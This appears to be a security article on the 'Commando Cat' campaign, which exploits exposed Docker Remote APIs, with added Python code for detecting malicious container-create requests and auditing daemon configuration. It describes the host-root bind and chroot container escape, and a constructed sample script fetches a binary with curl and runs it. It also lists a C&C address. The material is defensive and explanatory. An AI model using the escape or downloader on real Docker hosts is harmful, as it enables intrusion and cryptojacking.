A campaign dubbed “Commando Cat” has been observed exploiting exposed Docker remote API servers to deploy cryptocurrency miners.
This campaign, active since the beginning of 2024, initiates its attacks using images from the publicly available Commando project (cmd.cat).
The attackers use a container built from the cmd.cat/chattr Docker image to retrieve payloads from their command-and-control (C&C) infrastructure, posing a significant threat to Docker environments.
Initial Access
According to the Trend Micro report, the attack begins with the deployment of a seemingly benign Docker image named cmd.cat/chattr.
The malicious actor then creates a container from this image with the host's root filesystem bind-mounted inside it, and uses chroot into that mount to operate on the host operating system. curl or wget is then used to download the malicious binary onto the host.
Attack Sequence
1. Probing the Docker Remote API Server
The attack sequence starts with a request to the Docker Remote API server's ping endpoint, which confirms that the daemon is reachable and is the starting point for the chain of actions that follows.
2. Creating the Container Using cmd.cat/chattr Image
Upon receiving the server's "OK" response, the attacker instantiates a container using the cmd.cat/chattr image.
In this step, the attacker uses a combination of volume binding and chroot to escape the container.
The bind /:/hs mounts the host's root directory at /hs inside the container; chroot /hs then turns the container's shell into a shell on the host's filesystem, granting the attacker unrestricted access to it.
Additionally, binding the Docker socket (/var/run/docker.sock:/var/run/docker.sock) gives the container direct access to the Docker daemon on the host, which is equivalent to root on the host, because anyone who can talk to the daemon can start further containers with arbitrary mounts.
3. Pulling the Image if Absent
If the create request returns a "No such image" response, the attacker pulls the chattr image from the cmd.cat repository.
4. Container Deployment
With the image now present, the attacker repeats the container-create request from step 2, this time successfully.
The container's command is a base64-encoded string that decodes to a shell script.
The script checks for a file named "z" in /usr/sbin/ on the host. If the file does not exist, the script downloads the malicious binary from the attackers' file server and executes it; the binary is possibly ZiggyStarTux, an open-source IRC bot based on the Kaiten malware.
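Steps 2 to 4 above are all visible to a defender as container-create request bodies hitting the Docker Remote API. The following is an added example (not code from the article or from Trend Micro) of triaging such a request body: it decodes any base64 blob in the container command and flags the host-root bind, the Docker-socket bind, chroot, the /usr/sbin/z marker and a curl/wget downloader. The request bodies, the shell script and the download URL (a TEST-NET-3 address) are constructed for the example and are not the campaign's real artifacts.

```python
import base64
import binascii
import json
import re

# Constructed sample of the shell script the article describes: it checks for
# /usr/sbin/z on the host (reached through the /hs bind) and otherwise fetches
# and runs a binary. The download URL is a placeholder (TEST-NET-3), not the
# campaign's real file server.
SAMPLE_SCRIPT = (
    "chroot /hs /bin/sh -c '"
    "if [ ! -f /usr/sbin/z ]; then "
    "curl -s http://203.0.113.10/z -o /usr/sbin/z; chmod +x /usr/sbin/z; /usr/sbin/z; "
    "fi'"
)

# Constructed container-create request body in the shape the Docker Engine API
# accepts at POST /containers/create; the binds and image mirror the article.
SAMPLE_CREATE_REQUEST = json.dumps({
    "Image": "cmd.cat/chattr",
    "HostConfig": {"Binds": ["/:/hs", "/var/run/docker.sock:/var/run/docker.sock"]},
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
            + " | base64 -d | sh"],
})

# A benign request for comparison (also constructed).
BENIGN_CREATE_REQUEST = json.dumps({
    "Image": "nginx:1.25",
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    "Cmd": ["nginx", "-g", "daemon off;"],
})

DOCKER_SOCK = "/var/run/docker.sock"
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")


def decode_embedded_base64(command: str) -> list:
    """Decode every long base64-looking token in a command line to UTF-8 text.
    Tokens that are not valid base64, or do not decode to text, are skipped."""
    decoded = []
    for token in B64_TOKEN_RE.findall(command):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return decoded


def triage_create_request(body: str) -> dict:
    """Flag the host-escape primitives and payload markers from the article
    in one container-create request body."""
    req = json.loads(body)
    host_config = req.get("HostConfig") or {}
    binds = host_config.get("Binds") or []
    cmd = req.get("Cmd") or []
    cmd_text = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    findings = []

    # The host-side path is the part before the first ':' of a bind spec.
    host_paths = [b.split(":", 1)[0] for b in binds]
    if "/" in host_paths:
        findings.append("host root filesystem bound into container")
    if DOCKER_SOCK in host_paths:
        findings.append("docker socket bound into container")
    if host_config.get("Privileged"):
        findings.append("privileged container")

    # Inspect the command both as written and after decoding any base64 blob.
    scripts = decode_embedded_base64(cmd_text)
    haystack = "\n".join([cmd_text] + scripts)
    if "chroot" in haystack:
        findings.append("chroot in container command")
    if "/usr/sbin/z" in haystack:
        findings.append("marker file /usr/sbin/z referenced")
    if DOWNLOADER_RE.search(haystack):
        findings.append("downloader (curl/wget) in container command")

    return {"image": req.get("Image"), "findings": findings, "decoded_scripts": scripts}


if __name__ == "__main__":
    for name, body in (("malicious", SAMPLE_CREATE_REQUEST), ("benign", BENIGN_CREATE_REQUEST)):
        print(name, json.dumps(triage_create_request(body), indent=2))
```

The same checks apply to containers that already exist: docker inspect exposes HostConfig.Binds and Config.Cmd in the same shape, so a periodic sweep of running containers for a "/" host path or the Docker socket in the binds catches this escape pattern regardless of which image was used.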
The deployed malware attempts to connect to its C&C server at 45[.]9[.]148[.]193 on port 1219.
The first traffic after infection is the IRC registration exchange with that server; because 1219 is not a standard IRC port, an IRC handshake to it is a useful signature for detecting this malware on the network.
To protect development environments from attacks targeting containers and hosts, the following best practices are recommended:
- Proper Configuration: Containers and the Docker daemon's API should be configured to minimize the attack surface; in particular, the Remote API should never be reachable without TLS client authentication. Docker provides specific guidelines for hardening the daemon.
- Use Official Images: Organizations should use only official or certified images so that only trusted content runs in the environment.
- Avoid Root Privileges: Containers should run as an unprivileged application user rather than root, and user-namespace remapping should be enabled so that root inside a container is not root on the host.
- Restrict Access: The Docker Remote API should be reachable only from trusted sources, such as the internal network, and never from the internet.
- Adhere to Best Practices: Docker publishes a comprehensive list of best practices and built-in security features for securing container environments.
- Regular Security Audits: Security audits should be performed regularly to check for suspicious containers and images, including any container with a host-path or Docker-socket bind.
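The configuration point in the list above is concrete enough to check mechanically. The following added example (not from the article or from Docker's documentation) audits a daemon.json document for the settings that matter for this campaign: a tcp:// listener bound to every interface, a tcp:// listener without tlsverify, and missing user-namespace remapping. Both daemon.json documents are constructed for the example, and the certificate paths in the hardened one are placeholders.

```python
import json

# Constructed example of /etc/docker/daemon.json, not taken from the article.
# This exposes the Remote API on every interface, in plaintext, with no client
# authentication: exactly the kind of server Commando Cat scans for.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed hardened counterpart: keeps the Unix socket, binds TCP only on an
# internal address, requires a client certificate signed by the listed CA, and
# maps container root to an unprivileged host uid. Paths are placeholders.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.2:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
    "userns-remap": "default",
    "no-new-privileges": True,
})

# Bind addresses that mean "every interface" in a tcp:// host spec.
ALL_INTERFACES = {"", "0.0.0.0", "[::]", "::"}


def bind_address(tcp_host: str) -> str:
    """Return the address part of a tcp://addr:port host spec ('' if absent)."""
    addr = tcp_host[len("tcp://"):]
    return addr.rpartition(":")[0] if ":" in addr else addr


def audit_daemon_config(text: str) -> list:
    """Return the weaknesses in a daemon.json document that matter for this campaign."""
    cfg = json.loads(text)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are not network-reachable
        if bind_address(host) in ALL_INTERFACES:
            findings.append(f"Remote API listens on all interfaces ({host})")
        if not cfg.get("tlsverify"):
            findings.append(f"Remote API on {host} has no TLS client authentication")
        elif not all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
            findings.append("tlsverify is set but tlscacert/tlscert/tlskey are incomplete")
    if not cfg.get("userns-remap"):
        findings.append("userns-remap unset: root inside a container is root on the host")
    if not cfg.get("no-new-privileges"):
        findings.append("no-new-privileges unset: container processes may gain privileges via setuid binaries")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(text) or ["no findings"])
```

Two caveats a practitioner should keep in mind. First, TLS client authentication only limits who can talk to the daemon; anyone holding a valid client certificate is still effectively root on the host, so the listener should additionally be firewalled to the management network. Second, on systemd-managed installs, a "hosts" entry in daemon.json conflicts with the -H flag in the default unit file, so the listener is normally set in a systemd drop-in instead; the audit logic is the same either way.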
The Commando Cat campaign highlights the threat posed by exposed Docker remote API servers.
By abusing misconfigured Docker daemons and leveraging open-source tooling such as cmd.cat images, attackers can gain initial access and deploy malicious binaries while evading conventional security measures.
The campaign’s use of Docker images to propagate cryptojacking scripts underscores the importance of implementing robust container security practices.
Organizations must remain vigilant and adopt stringent security measures to protect their Docker environments from sophisticated attacks.